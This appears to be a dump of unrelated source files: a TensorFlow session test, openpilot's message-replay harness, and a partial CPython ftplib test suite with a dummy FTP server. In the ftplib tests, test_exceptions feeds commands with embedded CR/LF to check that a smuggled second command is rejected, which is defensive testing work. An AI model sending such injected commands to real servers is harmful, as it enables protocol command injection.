run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(constant_op.constant(1.0), options=None,
run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
if __name__ == '__main__':
googletest.main()
|
process_replay.py
|
#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
import signal
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from common.timeout import Timeout
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.car.car_helpers import get_car, interfaces
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
TIMEOUT = 15
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance', 'fake_pubsubmaster', 'submaster_config'], defaults=({},))
def wait_for_event(evt):
if not evt.wait(TIMEOUT):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services, ignore_alive=None, ignore_avg_freq=None):
super().__init__(services, ignore_alive=ignore_alive, ignore_avg_freq=ignore_avg_freq, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super().update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock, fingerprint):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock, fingerprint):
if fingerprint:
CarInterface, _, _ = interfaces[fingerprint]
CP = CarInterface.get_params(fingerprint)
else:
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def controlsd_rcv_callback(msg, CP, cfg, fsm):
# no sendcan until controlsd is initialized
socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
if "sendcan" in socks and fsm.frame < 2000:
socks.remove("sendcan")
return socks, len(socks) > 0
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaStates": [], "peripheralState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "managerState": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=controlsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
submaster_config={'ignore_avg_freq': ['radarState', 'longitudinalPlan']}
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan", "longitudinalPlan"],
"carState": [], "controlsState": [], "radarState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay", "longitudinalPlan.solverExecutionTime", "lateralPlan.solverExecutionTime"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=False,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
fake_pubsubmaster=False,
),
]
def replay_process(cfg, lr, fingerprint=None):
if cfg.fake_pubsubmaster:
return python_replay_process(cfg, lr, fingerprint)
else:
return cpp_replay_process(cfg, lr, fingerprint)
def setup_env():
params = Params()
params.clear_all()
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("Passive", False)
params.put_bool("CommunityFeaturesToggle", True)
os.environ["NO_RADAR_SLEEP"] = "1"
os.environ["REPLAY"] = "1"
def python_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets, **cfg.submaster_config)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
setup_env()
# TODO: remove after getting new route for civic & accord
migration = {
"HONDA CIVIC 2016 TOURING": "HONDA CIVIC 2016",
"HONDA ACCORD 2018 SPORT 2T": "HONDA ACCORD 2018",
"HONDA ACCORD 2T 2018": "HONDA ACCORD 2018",
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
if fingerprint is not None:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = fingerprint
else:
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
Params().put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock, fingerprint)
CP = car.CarParams.from_bytes(Params().get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs, disable=CI):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(msg.logMonoTime / 1e9, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg().as_builder()
m.logMonoTime = msg.logMonoTime
m = m.as_reader()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
log_msgs = []
setup_env()
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
try:
with Timeout(TIMEOUT):
while not all(pm.all_readers_updated(s) for s in cfg.pub_sub.keys()):
time.sleep(0)
# Make sure all subscribers are connected
sockets = {s: messaging.sub_sock(s, timeout=2000) for s in sub_sockets}
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for i, msg in enumerate(tqdm(pub_msgs, disable=False)):
pm.send(msg.which(), msg.as_builder())
resp_sockets = cfg.pub_sub[msg.which()] if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is None:
print(f"Warning, no response received {i}")
else:
response = response.as_builder()
response.logMonoTime = msg.logMonoTime
response = response.as_reader()
log_msgs.append(response)
if not len(resp_sockets): # We only need to wait if we didn't already wait for a response
while not pm.all_readers_updated(msg.which()):
time.sleep(0)
finally:
managed_processes[cfg.proc_name].signal(signal.SIGKILL)
managed_processes[cfg.proc_name].stop()
return log_msgs
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
TIMEOUT = 3
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
